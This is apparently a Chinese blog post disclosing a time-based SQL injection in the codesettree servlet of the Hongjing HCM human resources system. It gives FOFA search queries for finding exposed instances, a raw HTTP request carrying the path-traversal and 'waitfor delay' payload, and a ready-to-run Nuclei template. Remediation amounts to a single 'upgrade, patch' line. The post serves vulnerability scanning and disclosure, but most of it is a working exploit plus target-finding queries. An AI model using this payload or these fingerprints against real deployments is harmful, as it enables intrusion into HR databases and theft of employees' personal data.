宏景HCM系统是一款由宏景软件研发的系统,主要功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理,以及人事、绩效、培训、招聘、考勤等业务自助,还具备了报表功能和灵活的表格工具,支持集团管控、目标管理、领导决策等应用。该漏洞存在于宏景EHR人力资源管理系统的 codesettree接口处,该功能存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
app="HJSOFT-HCM" || body="宏景" || body="hj-hy-all-one-logo" || body="/general/sys/hjaxmanage.js"
GET /templates/attestation/../../servlet/codesettree?flag=3&codesetid=111';waitfor+delay+'0:0:7'--+&parentid=-1&fromflag=" HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0)
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
id: hongjing-hcm-codesettree-sql
info:
name: 宏景ehr-hcm-codesettree-sql注入
author: nobody
severity: high
description: |
宏景EHR人力资源管理系统codesettree接口处存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
impact: |
攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作
remediation: |
升级版本,打补丁
metadata:
verified: true
max-request: 3
fofa-query: app="HJSOFT-HCM" || body="宏景" || body="/general/sys/hjaxmanage.js"
tags: hongjing-HCM,sql
requests:
- raw:
- |
GET /templates/attestation/../../servlet/codesettree?flag=3&codesetid=111';waitfor+delay+'0:0:6'--+&parentid=-1&fromflag=" HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0)
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
matchers:
- type: dsl
condition: and
dsl:
- "duration>=6"
- status_code==200 && contains_all(body,"?xml")
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.